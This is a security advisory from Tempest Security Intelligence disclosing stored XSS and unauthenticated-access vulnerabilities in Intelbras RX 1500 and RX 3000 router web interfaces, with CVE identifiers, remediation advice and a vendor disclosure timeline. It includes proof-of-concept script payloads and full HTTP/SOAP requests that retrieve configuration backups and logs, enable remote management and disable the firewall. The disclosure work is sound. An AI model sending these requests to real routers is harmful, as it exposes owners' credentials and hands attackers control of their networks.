📄 Intelbras RX 1500 2.2.9 / RX 3000 1.0.11 IDOR / XSS

=====[Tempest Security
    Intelligence]==========================================
    
    Multiple vulnerabilities in the web management interface of Intelbras
    routers
    
    Author: Gabriel Lima <gabriel lima () tempest com br >
    
    =====[Table of
    Contents]======================================================
    
    1. Overview
    
    2. Detailed description
    
    3. Other contexts & solutions
    
    4. Acknowledgements
    
    5. Timeline
    
    6. References
    
    =====[1.
    Overview]============================================================
    
    * Systems affected:
    
    Intelbras web interface RX 1500 - 2.2.9
    
    (verified) (other routers/versions may be affected)
    
    Intelbras web interface RX 3000 - 1.0.11
    
    (verified) (other routers/versions may be affected)
    
    * Release date: 07/14/2025
    
    * Impact: Several vulnerabilities were found providing retrieval of
    administrative session tokens and direct unauthenticated access to
    sensitive features that allow the recovery of current router configuration.
    
    The new generation of connection comes via Wi-Fi 6 technology, delivering
    more speed, more network efficiency and less interference. Router RX 1500
    [1] and RX 3000 [2] are ideal for residential plans with high-speed plans
    and high-performance connections.
    
    =====[2. Detailed
    description]================================================
    
    The web management system for the RX 1500 and 3000 routers is designed to
    help the device’s administrator configure the device in the best way for
    their needs. However, upon carrying out a security research, multiple
    vulnerabilities related to XSS and direct unauthenticated access were
    spotted.
    
    As a result of performing this research, two types of vulnerabilities were
    found: Cross-Site Scripting (XSS) vulnerabilities and Direct
    Unauthenticated Access vulnerabilities.
    
    In regard to the XSS vulnerabilities, as a means to portray impact
    outcomes, an unauthenticated attacker may gain administrative access to the
    system and have full control of the router. On the other hand, an attacker
    with administrator access is able to create persistence to maintain access.
    
    Furthermore, in regard to the direct and unauthenticated access
    vulnerabilities, the application hosts endpoints that provide the
    retrieval  of log files and the router's configuration file, which in turn,
    stores the device's password and its current settings. An important
    highlight regards the fact that any feature can be accessed in an
    unauthenticated manner, as long as an administrator is authenticated and
    active within the system.
    
    The following section dissects the XSS issues.
    
    2.1 Possibility of injecting JavaScript code into client names (XSS) -
    CVE-2025-26064
    
    An authenticated threat may inject persistent JavaScript from the connected
    clients configuration feature (Home > Connected clients). This problem
    occurs due to the lack of character handling in the “Name” field.
    
    As proof of concept, the following payload was used:
    
    &lt;script&gt;alert(1)&lt;/script&gt;
    
    Payload used in plain text:
    
    <script>alert(1)</script>
    
    The following request pinpoints the insertion of the payload:
    
    [snippet]
    
    POST /HNAP1/ HTTP/1.1
    
    Host: 10.0.0.1
    
    Content-Type: text/xml; charset=utf-8
    
    SOAPAction: "http://purenetworks.com/HNAP1/SetClientInfo"
    
    X-Requested-With: XMLHttpRequest
    
    Content-Length: 596
    
    Cookie: uid=COOKIE-HERE
    
    <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="
    http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="
    http://www.w3.org/2001/XMLSchema" xmlns:soap="
    http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><SetClientInfo xmlns="
    http://purenetworks.com/HNAP1/
    "><ClientInfoLists><ClientInfo><MacAddress>Client-MacAddresss</MacAddress><NickName>PAYLOAD-IN-HTML-ENCODE</NickName><ReserveIP></ReserveIP><secRouter></secRouter><Type>WIFI_5G</Type><COMMAND>change</COMMAND></ClientInfo></ClientInfoLists><COMMAND></COMMAND></SetClientInfo></soap:Body></soap:Envelope>
    
    [/snippet]
    
    Upon submitting this request, please note the outcome rendered within the
    context of the victim's browser.
    
    2.2 Possibility of injecting JavaScript code into the name of the visiting
    network (XSS) - CVE-2025-26064
    
    An authenticated threat may inject persistent JavaScript from the Guest
    Network functionality (in the Settings > Wi-Fi > Guest Network menu). This
    problem occurs due to the lack of character handling in the “Wi-Fi network
    name” field (both in 2.4GHz and 5GHz).
    
    As a proof of concept, the following payloads were HTML encoded and
    inserted into each field:
    
    2.4GHz network: &lt;script&gt;alert(1)&lt;/script&gt;
    
    5GHz network: &lt;script&gt;alert(2)&lt;/script&gt;
    
    Payloads used in plain text:
    
    2.4GHz network: <script>alert(1)</script>
    
    5GHz network: <script>alert(2)</script>
    
    The following portrays an example of the request submitted by the attacker:
    
    [snippet]
    
    POST /HNAP1/ HTTP/1.1
    
    Host: 10.0.0.1
    
    Content-Type: text/xml; charset=utf-8
    
    SOAPAction: "http://purenetworks.com/HNAP1/SetMultipleActions"
    
    X-Requested-With: XMLHttpRequest
    
    Content-Length: 2991
    
    Cookie: uid=COOKIE-HERE
    
    <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="
    http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="
    http://www.w3.org/2001/XMLSchema" xmlns:soap="
    http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><SetMultipleActions
    xmlns="http://purenetworks.com/HNAP1/"><SetWLanRadioSettings xmlns="
    http://purenetworks.com/HNAP1/"><RadioID>RADIO_2.4GHz_Guest</RadioID><OpenMainWiFiFirst>false</OpenMainWiFiFirst><Enabled>true</Enabled><Mode>802.11bgn</Mode><SSID>PAYLOAD-IN-HTML-ENCODE-2.4GHz</SSID><SSIDBroadcast>true</SSIDBroadcast><ChannelWidth>20/40</ChannelWidth><Channel>0</Channel><SecondaryChannel>0</SecondaryChannel><QoS>false</QoS><ScheduleName>Always</ScheduleName><TXPower></TXPower><Coexistence>false</Coexistence><WmmCapable></WmmCapable><MuOfdma></MuOfdma><MuMimo></MuMimo><Beamforming></Beamforming><ETxBfEnCond></ETxBfEnCond><TWTSupport></TWTSupport><BssColor></BssColor></SetWLanRadioSettings><SetWLanRadioSecurity
    xmlns="http://purenetworks.com/HNAP1/"><RadioID>RADIO_2.4GHz_Guest</RadioID><Enabled>false</Enabled><Type>OPEN</Type><Encryption>NONE</Encryption><KeyRenewal></KeyRenewal><RadiusIP1></RadiusIP1><RadiusPort1></RadiusPort1><RadiusSecret1></RadiusSecret1><RadiusIP2></RadiusIP2><RadiusPort2></RadiusPort2><RadiusSecret2></RadiusSecret2><Key>ROUTER-KEY</Key></SetWLanRadioSecurity><SetWLanRadioSettings
    xmlns="http://purenetworks.com/HNAP1/"><RadioID>RADIO_5GHz_Guest</RadioID><OpenMainWiFiFirst>false</OpenMainWiFiFirst><Enabled>true</Enabled><Mode>802.11anac</Mode><SSID>PAYLOAD-IN-HTML-ENCODE-5GHz</SSID><SSIDBroadcast>true</SSIDBroadcast><ChannelWidth>20/40/80</ChannelWidth><Channel>0</Channel><SecondaryChannel>0</SecondaryChannel><QoS>false</QoS><ScheduleName></ScheduleName><TXPower></TXPower><Coexistence>false</Coexistence><WmmCapable></WmmCapable><MuOfdma></MuOfdma><MuMimo></MuMimo><Beamforming></Beamforming><ETxBfEnCond></ETxBfEnCond><TWTSupport></TWTSupport><BssColor></BssColor></SetWLanRadioSettings><SetWLanRadioSecurity
    xmlns="http://purenetworks.com/HNAP1/"><RadioID>RADIO_5GHz_Guest</RadioID><Enabled>false</Enabled><Type>OPEN</Type><Encryption>NONE</Encryption><KeyRenewal></KeyRenewal><RadiusIP1></RadiusIP1><RadiusPort1></RadiusPort1><RadiusSecret1></RadiusSecret1><RadiusIP2></RadiusIP2><RadiusPort2></RadiusPort2><RadiusSecret2></RadiusSecret2><Key>ROUTER-KEY</Key></SetWLanRadioSecurity><SetGuestZoneRouterSettings
    xmlns="http://purenetworks.com/HNAP1/
    "><InternetAccessOnly>false</InternetAccessOnly><IPAddress></IPAddress><SubnetMask></SubnetMask><DHCPServer>true</DHCPServer><DHCPRangeStart></DHCPRangeStart><DHCPRangeEnd></DHCPRangeEnd><DHCPLeaseTime>0</DHCPLeaseTime></SetGuestZoneRouterSettings></SetMultipleActions></soap:Body></soap:Envelope>
    
    [/snippet]
    
    By accessing the system's home page (namely: the Status page), one can
    observe the JavaScript rendering for both fields.
    
    2.3 Possibility of multiple JavaScript code injections in the Site Survey
    feature (XSS) - CVE-2025-26063
    
    The “Site Survey” feature (Management > Site Survey) has the purpose of
    displaying nearby active WIFI networks, and presenting their ESSIDs among
    other details. However, due to the lack of character handling, whenever an
    attacker creates a fake WIFI network containing HTML/JavaScript code (e.g.
    “<script>alert(1)</script>”), and the router administrator uses this
    feature, the malicious code will be executed at the moment the tab listing
    all available ESSIDs is opened.
    
    As a proof of concept, an SSID with the following name was created:
    
    <script>alert(1)</script>
    
    The following portrays an example of the request made by the administrator
    upon starting “Site Survey” scan:
    
    [snippet]
    
    POST /HNAP1/ HTTP/1.1
    
    Host: [redacted]
    
    SOAPAction: "http://purenetworks.com/HNAP1/igd_wifi_list_scan_start"
    
    X-Requested-With: XMLHttpRequest
    
    Content-Length: 357
    
    Cookie: [redacted]
    
    <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="
    http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="
    http://www.w3.org/2001/XMLSchema" xmlns:soap="
    http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><igd_wifi_list_scan_start
    xmlns="http://purenetworks.com/HNAP1/
    "><radio>2.4g</radio></igd_wifi_list_scan_start></soap:Body></soap:Envelope>
    
    [/snippet]
    
    The XSS is executed by hovering the mouse pointer over the network's name
    (highlighted in the graphic presented within the router’s/device’s web
    management interface) or by opening the nearby devices section.
    
    The following section dissects the direct unauthenticated access issues.
    
    2.4 Incorrect Access Control - CVE-2025-26062
    
    This session will address 3 access control breach vulnerabilities,
    considered by mitre to be duplicates. For better understanding, they will
    be considered only as one topic.
    
    2.4.1 Possibility of retrieving router logs
    
    The given router's administrative interface provides a feature (Management
    > System log) that allows an authenticated entity (e.g: an administrator)
    to retrieve the router's log file, which may contain potentially sensitive
    debug information. However, due to the lack of permissions validation, an
    unauthenticated entity can download the file without performing the
    authentication procedure.
    
    The following is an example request used as proof of concept:
    
    [snippet]
    
    POST /cgi-bin/dllog.cgi HTTP/1.1
    
    Host: 10.0.0.1
    
    Content-Type: application/x-www-form-urlencoded
    
    Content-Length: 13
    
    Export=Export
    
    [/snippet]
    
    As a result, a log file containing potentially sensitive information is
    provided for download.
    
    
    2.4.2 Possibility of recovering backups of router settings
    
    The given router's administrative interface provides a feature (Management
    > System) that allows an authenticated entity (e.g: an administrator) to
    retrieve the router's current configuration file, which may contain
    potentially sensitive information pertaining to the environment. However,
    due to the lack of permissions validation, an unauthenticated entity can
    download the file without performing the authentication procedure.
    
    To exploit the aforementioned concept, the following snippet illustrates
    the request made at the affected point by an unauthenticated attacker
    retrieving the router's configuration file, as well as showing part of the
    contents of the ".cfg" file in the request response:
    
    [snippet]
    
    POST /cgi-bin/ExportSettings.sh HTTP/1.1
    
    Host: 10.0.0.1
    
    Content-Type: application/x-www-form-urlencoded
    
    Content-Length: 13
    
    Export=Export
    
    [/snippet]
    
    As a result of submitting the previously shown request, the retrieval of
    the  .cfg backup file is done without the need for providing proper
    authorization.
    
    2.4.3 Possibility of accessing various functionalities in an
    unauthenticated manner
    
    Various router features, such as editing firewall rules, configuring Wi-Fi
    specifications, and changing router security rules and policies, were found
    to be accessible in an unauthenticated manner if an administrator
    synchronically accessed the router's administrative interface at the moment
    of exploitation.
    
    In other words, the only caveat necessary to exploit this unauthenticated
    access is having an administrator logged in at the moment of exploitation.
    
    The following snippet represents a request to render the router's
    administrative interface publicly accessible (e.g.: accessible from the
    Internet):
    
    [snippet]
    
    POST /HNAP1/ HTTP/1.1
    
    Host: 10.0.0.1
    
    Content-Type: text/xml; charset=utf-8
    
    SOAPAction: "http://purenetworks.com/HNAP1/SetAdministrationSettings"
    
    X-Requested-With: XMLHttpRequest
    
    Content-Length: 491
    
    <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="
    http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="
    http://www.w3.org/2001/XMLSchema" xmlns:soap="
    http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><SetAdministrationSettings
    xmlns="http://purenetworks.com/HNAP1/
    "><HTTPS>false</HTTPS><RemoteMgt>true</RemoteMgt><RemoteMgtPort>8080</RemoteMgtPort><RemoteMgtHTTPS>false</RemoteMgtHTTPS><InboundFilter></InboundFilter></SetAdministrationSettings></soap:Body></soap:Envelope>
    
    [/snippet]
    
    The following snippet portrays a request with the purpose of disabling the
    router's Denial of Service (DoS) protection:
    
    [snippet]
    
    POST /HNAP1/ HTTP/1.1
    
    Host: 10.0.0.1
    
    Content-Type: text/xml; charset=utf-8
    
    SOAPAction: "http://purenetworks.com/HNAP1/SetFirewallEnableSettings"
    
    X-Requested-With: XMLHttpRequest
    
    Content-Length: 381
    
    <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="
    http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="
    http://www.w3.org/2001/XMLSchema" xmlns:soap="
    http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><SetFirewallEnableSettings
    xmlns="http://purenetworks.com/HNAP1/
    "><Firewall_Enabled>false</Firewall_Enabled></SetFirewallEnableSettings></soap:Body></soap:Envelope>
    
    [/snippet]
    
    Other features are accessible in an unauthenticated manner, as long as the
    request is sent when the administrator is active.
    
    According to the arguments disclosed in this section, various attack
    vectors for administrative access originating from the perspective of an
    unauthenticated user becomes feasible. Furthermore, once authenticated as
    an administrator, an attacker would be able to generate persistence with
    the same approaches.
    
    =====[3. Other contexts &
    solutions]==========================================
    
    In regard to the XSS disclosed issues, it is recommended that all
    information coming from third parties (databases, other applications,
    client-side, etc.) have their special characters converted to the **HTML
    Entities** character set. Moreover, the data must be semantically filtered
    to guarantee that it conforms to the expected format and is free of any
    undesired characters.
    
    In regard to the unauthenticated access disclosed issues, it is strongly
    recommended that changes be made to the application's existing session
    management and access control, such that access to sensitive
    functionalities is available only to authenticated users, and that these
    users perform only actions permitted by their authorization profile.
    
    Moreover, it is important to highlight that all logic that determines
    whether a user has the necessary permissions to perform a certain action
    must execute **exclusively on the server-side**.
    
    =====[4.
    Acknowledgements]====================================================
    
    - Joaquim Brasil de Oliveira < joaquim brasil () tempest com br >
    
    - Tempest Security Intelligence[3]
    
    =====[5.
    Timeline]============================================================
    
    07/15/2024 - We contacted the manufacturer reporting an XSS vulnerability
    in the Site Survey functionality;
    
    07/16/2024 - The vendor requested contact information;
    
    07/17/2024 - Contact information has been sent to the supplier;
    
    07/17/2024 - The vendor has begun the process of validating and
    acknowledging the first bug reported;
    
    07/22/2024 - A full report has been sent with all the other discovered
    vulnerabilities;
    
    07/25/2024 - The vendor acknowledged all the vulnerabilities reported in
    the RX 1500 and RX 3000 devices;
    
    09/19/2024 - The vendor has released the beta version of the corrected
    firmware 2.2.12
    
    09/23/2024 - All points have been retested and fixed;
    
    01/27/2025 - Request CVE IDs from MITRE;
    
    02/24/2025 - MITRE sent the CVEs IDs;
    
    07/14/2025 - Publication date.
    
    
    
    =====[6.
    References]==========================================================
    
    [1] <http://www.asus.com/Networking/RTAC68U/>
    https://www.intelbras.com/pt-br/roteador-wi-fi-6-dual-band-rx-1500
    
    [2] http://intelbras.com/pt-br/roteador-wireless-rx-3000
    
    [3] https://tempest.com.br
    
    -- 
    
    *Esta mensagem é para uso exclusivo de seu destinatário e pode conter 
    informações privilegiadas e confidenciais. Todas as informações aqui 
    contidas devem ser tratadas como confidenciais e não devem ser divulgadas a 
    terceiros sem o prévio consentimento por escrito da Tempest. Se você não é 
    o destinatário não deve distribuir, copiar ou arquivar a mensagem. Neste 
    caso, por favor, notifique o remetente da mesma e destrua imediatamente a 
    mensagem.*
    
    *
    *
    *This message is intended solely for the use of its 
    addressee and may contain privileged or confidential information. All 
    information contained herein shall be treated as confidential and shall not 
    be disclosed to any third party without Tempest’s prior written approval. 
    If you are not the addressee you should not distribute, copy or file this 
    message. In this case, please notify the sender and destroy its contents 
    immediately.**
    *
    *
    *